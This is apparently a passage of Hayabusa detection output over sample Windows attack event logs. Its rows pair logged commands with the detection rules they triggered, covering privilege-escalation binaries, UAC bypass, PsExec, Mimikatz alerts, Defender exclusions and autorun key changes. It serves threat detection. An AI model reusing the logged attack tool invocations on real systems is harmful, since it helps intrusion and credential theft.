Control/bits_openvpn.evtx +2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,informational,Process Creation,"Command: pocacct.exe payload.dll : Path: C:\Users\lgreen\Downloads\PrivEsc\pocacct.exe : User: 3B\lgreen : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 19:45:14.007 +09:00,02694w-win10.threebeesco.com,1,informational,Process Creation,Command: C:\WINDOWS\System32\spoolsv.exe : Path: C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\WINDOWS\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 22:23:30.614 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-26 22:23:32.141 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: byeintegrity5-uac.exe : Path: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-27 02:38:11.154 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: taskhostw.exe $(Arg0) : Path: C:\Windows\System32\taskhostw.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx 
+2020-11-27 02:38:11.175 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: taskhostw.exe $(Arg0)",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-28 05:15:22.956 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-28 05:15:23.662 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 01:17:33.019 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 01:17:34.712 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 21:31:21.179 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: 
https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 21:31:22.012 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-30 01:29:22.597 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bsJv4.img?w=100&h=100&m=6&tilesize=medium&x=3175&y=1599&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-30 22:15:33.442 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-05 07:41:04.470 
+09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-05 07:41:04.542 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-05 07:41:04.545 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\psexecprivesc.exe"" C:\Windows\System32\mspaint.exe : Path: C:\Users\Public\psexecprivesc.exe : User: MSEDGEWIN10\user02 : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:34.622 +09:00,MSEDGEWIN10,17,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\PSEXESVC.exe : Path: C:\Windows\PSEXESVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,PsExec Service Start,,rules/sigma/process_creation/win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,PsExec Tool Execution,,rules/sigma/process_creation/process_creation_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:42.478 +09:00,MSEDGEWIN10,18,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:44.864 +09:00,MSEDGEWIN10,18,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:45.141 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mspaint.exe"" 췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍 : Path: C:\Windows\System32\mspaint.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\PSEXESVC.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 20:18:54.600 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding : Path: C:\Windows\System32\wbem\WmiPrvSE.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-10 
20:18:54.856 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-10 20:18:54.856 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimidrv.sys : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimikatz.exe : Process: 
C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimidrv.sys; file:_C:\Users\admmig\Documents\mimilib.dll : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 
+09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimikatz.exe : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimikatz.exe : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx +2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,PowerShell Network 
Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx +2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:44:51.331 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair 
Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:45:04.144 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe"" ""C:\Users\bouss\source\repos\blabla\blabla.sln""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:13.978 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd : Path: C:\Windows\SysWOW64\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,informational,Process 
Creation,"Command: powershell.exe start-process notepad.exe : Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.296 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\SysWOW64\notepad.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: powershell.exe start-process notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.428 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp"" : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true 
/low:false",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.456 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\cl.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.667 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\VCTIP.EXE"" : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\vctip.exe : User: LAPTOP-JU4M3I0E\bouss : Parent 